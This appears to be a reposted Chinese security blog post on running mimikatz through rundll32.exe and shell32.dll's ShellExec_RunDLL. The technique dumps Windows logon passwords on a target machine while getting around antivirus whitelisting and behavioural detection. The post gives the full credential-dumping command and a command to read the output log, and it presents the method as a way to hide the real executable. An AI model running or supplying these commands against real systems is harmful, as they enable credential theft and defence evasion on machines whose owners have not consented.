骚姿势之shell32.dll执行getpass

颓废 2019年11月21日23:50:17颓废's Blog评论916 views586字阅读1分57秒阅读模式
摘要

最近在做安全维持的时候看到的,找到的一位大佬的文章,受益匪浅  丢在自己博客上做一个统计

最近在做安全维持的时候看到的,找到的一位大佬的文章,受益匪浅  丢在自己博客上做一个统计

系统文件shell32.dll是存放在Windows/System32系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要
系统文件sshell32.dll是Windows的32位外壳动态链接库文件,用于打开网页和文件,建立文件时的默认文件名的设置等大量功能。它提供了explorer.exe的功能,比如”找开“,”运行程序“等,我们可以使用IDA打开这个DLL然后查看导出表。
骚姿势之shell32.dll执行getpass

先将免杀过后的mimikatz上传到目标机上,利用shell32的目的在于能够执行,绕过一些杀毒白名单之类的操作,再或者通用的cmd /c 方式可能会触发行为查杀拦截。

rundll32.exe shell32.dll,ShellExec_RunDLL c:/Users/mac/Desktop/a/a "log" "privilege::debug" "sekurlsa::logonPasswords full" "exit"

骚姿势之shell32.dll执行getpass

type c:/windows/system32/mimikatz.log

骚姿势之shell32.dll执行getpass

成功绕过,并查看到密码

骚姿势之shell32.dll执行getpass

就是被拦截也是没有显示出你的mimikatz执行的动态,显示的提醒是rundll32,和shell32.dll恶意执行。这样就隐藏了真实被执行的软件骚姿势之shell32.dll执行getpass

原文链接:Go

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年11月21日23:50:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  骚姿势之shell32.dll执行getpass http://cn-sec.com/archives/74172.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: